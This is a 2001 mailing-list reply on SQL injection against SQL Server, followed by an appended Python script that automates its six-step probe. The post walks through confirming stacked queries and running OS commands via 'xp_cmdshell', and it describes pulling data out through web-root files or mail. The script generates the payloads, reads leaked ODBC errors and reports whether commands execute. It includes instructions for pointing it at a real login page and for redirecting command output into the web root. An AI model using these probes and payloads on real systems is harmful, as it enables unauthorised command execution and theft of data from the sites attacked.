RE: SQL

From: Javier Fernández-Sanguino (jfernandezat_private)
Date: Fri Nov 23 2001 - 01:15:17 PST


> Don't you need the returned recordset to be written to the html stream
> in order to see anything useful?  For instance if you are just looking
> at a login page you may not get any joy with appending extra SELECTs?
> We have just been playing with exactly this!
    
	Not really, it depends on the system configuration. If you can
(and you quite probably can) run 'exec master..xp_cmdshell' you can have
the queries directed to files in the Web server (if you know its
location) and retrieve them from there. You can even (check the stored
procedures for SQL Server) send yourself mails with the results of the
queries or with execution results! (I did this once and it was kind of fun)

	So, even if not shown inline, that does not mean you cannot
retrieve any information, but you have to use alternative ways which
will work (or not) depending on the system's configuration and the
access to the perimeter.
    
	One easy way to determine if you are effectively executing code
is to do incremental tests:

1.- test with '
	ODBC error
2.- test with '--
	error? (depends on query)
3.- test with ', ...fill in data... ) --
	error?
(keep going until you get no errors; this, of course, is easier if you
know the code beforehand, there are many ISS vulns which will get you to
it...)
4.- test with ', ...data... ; select * from asdfadfas --
	Probable error since the table 'asdfadfas' does not exist
5.- test with ', ...data... ; select * from AVALIDSQLTABLE --
	No error since that table (take a look at default tables for SQL
Server) does exist.
6.- test with ', ...data... ; exec master..xp_cmdshell 'dir',no_output --
	No error? Then you are executing code. Check the error (if there
is one) since it might say that the user running the query cannot
execute stored procedures...
    
    
	Do you get the idea?

	Javi
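The incremental series above, automated, as an added example that is not part of Javi's post. The script builds the six payloads for a value that lands inside an INSERT ... VALUES(...) list (the three-column INSERT and the `, 'x', 1` filler are assumptions), submits each one through a caller-supplied `send` function, classifies the leaked ODBC/SQL Server error text, and draws the same conclusion the post draws at each step. The `fake_target` function is a constructed stand-in for a login page that executes nothing but reproduces the real SQL Server error strings, so the whole thing runs offline; against a real site you would replace it with a function that puts the payload in the login field and returns the response body.

```python
"""Incremental SQL injection probing against a page that never echoes result rows.

Added example, not part of the original post. The target below (fake_target) is a
constructed stand-in; the three-column INSERT it simulates is an assumption.
"""
import re
from typing import Callable, List, Tuple

# Genuine SQL Server / ODBC driver message fragments. Loose patterns on purpose:
# the HTML around them differs from site to site.
ODBC_BANNER = re.compile(
    r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\]"
    r"|Microsoft OLE DB Provider for ODBC Drivers", re.I)
SYNTAX = re.compile(r"Unclosed quotation mark|Incorrect syntax near", re.I)
MISSING_OBJECT = re.compile(r"Invalid object name '[^']+'", re.I)
PERMISSION = re.compile(r"EXECUTE permission denied on object '[^']+'", re.I)


def classify(body: str) -> str:
    """Map a response body to the error class the post reasons about."""
    if PERMISSION.search(body):
        return "permission_denied"   # step 6: injection works, no xp_cmdshell rights
    if MISSING_OBJECT.search(body):
        return "missing_object"      # step 4: the bogus table name was parsed and run
    if SYNTAX.search(body):
        return "syntax_error"        # steps 1-3: the statement is not closed yet
    if ODBC_BANNER.search(body):
        return "other_odbc_error"
    return "no_error"


def probe_series(filler: str) -> List[Tuple[int, str]]:
    """The post's six payloads for a value inside INSERT ... VALUES(...).

    `filler` supplies the remaining columns (e.g. ", 'x', 1"); the closing ")"
    found at step 3 is kept for steps 4-6 so only the injected tail changes.
    """
    tail = f"'{filler}) ; "
    return [
        (1, "'"),
        (2, "'--"),
        (3, f"'{filler}) --"),
        (4, tail + "select * from asdfadfas --"),
        (5, tail + "select * from sysobjects --"),  # sysobjects exists in every database
        (6, tail + "exec master..xp_cmdshell 'dir', no_output --"),
    ]


def run_series(send: Callable[[str], str], filler: str) -> List[Tuple[int, str]]:
    """Submit each probe and classify the answer; returns (step, verdict) pairs."""
    return [(step, classify(send(payload))) for step, payload in probe_series(filler)]


def conclude(results: List[Tuple[int, str]]) -> str:
    """Draw the conclusion the post draws from the pattern of errors."""
    steps = dict(results)
    if steps.get(1) == "no_error":
        # Nothing leaks at all, so "no error" at later steps proves nothing.
        return "no ODBC error leaked: use out-of-band retrieval (files, mail) instead"
    if steps.get(6) == "no_error":
        return "executing OS commands through xp_cmdshell"
    if steps.get(6) == "permission_denied":
        return "injection confirmed, but this login cannot run xp_cmdshell"
    if steps.get(4) == "missing_object" and steps.get(5) == "no_error":
        return "stacked queries run; injection confirmed"
    return "statement not closed yet: adjust the filler and retry"


def fake_target(payload: str, can_cmdshell: bool = True) -> str:
    """Constructed stand-in for an ASP login page on SQL Server 2000.

    It executes nothing; it only reproduces the error text such a page leaks
    when the injected INSERT fails. The three-column INSERT is an assumption.
    """
    query = f"INSERT INTO logins VALUES('{payload}', 'secret', 1)"
    banner = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14'<br>"
              "[Microsoft][ODBC SQL Server Driver][SQL Server]")
    stmt = query.split("--", 1)[0]  # crude: the probes never put -- inside a string
    if stmt.count("'") % 2:
        return banner + "Unclosed quotation mark before the character string ''."
    if stmt.count("(") != stmt.count(")"):
        return banner + "Line 1: Incorrect syntax near ''."
    if "asdfadfas" in stmt:
        return banner + "Invalid object name 'asdfadfas'."
    if "xp_cmdshell" in stmt and not can_cmdshell:
        return banner + ("EXECUTE permission denied on object 'xp_cmdshell', "
                         "database 'master', owner 'dbo'.")
    return "<html><body>Login failed. Please try again.</body></html>"


if __name__ == "__main__":
    results = run_series(fake_target, ", 'x', 1")
    for step, verdict in results:
        print(step, verdict)
    print(conclude(results))
```

Against the constructed target the series reads: syntax error, syntax error, clean, "Invalid object name", clean, clean, which is exactly the pattern the post says means you are executing code; with `can_cmdshell=False` the last step instead comes back "EXECUTE permission denied", the case the post tells you to look for in the error text. For the out-of-band path the post describes, the step-6 command would be swapped for one whose output is redirected into the web root, since `no_output` suppresses any result that might otherwise have surfaced.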
    
    


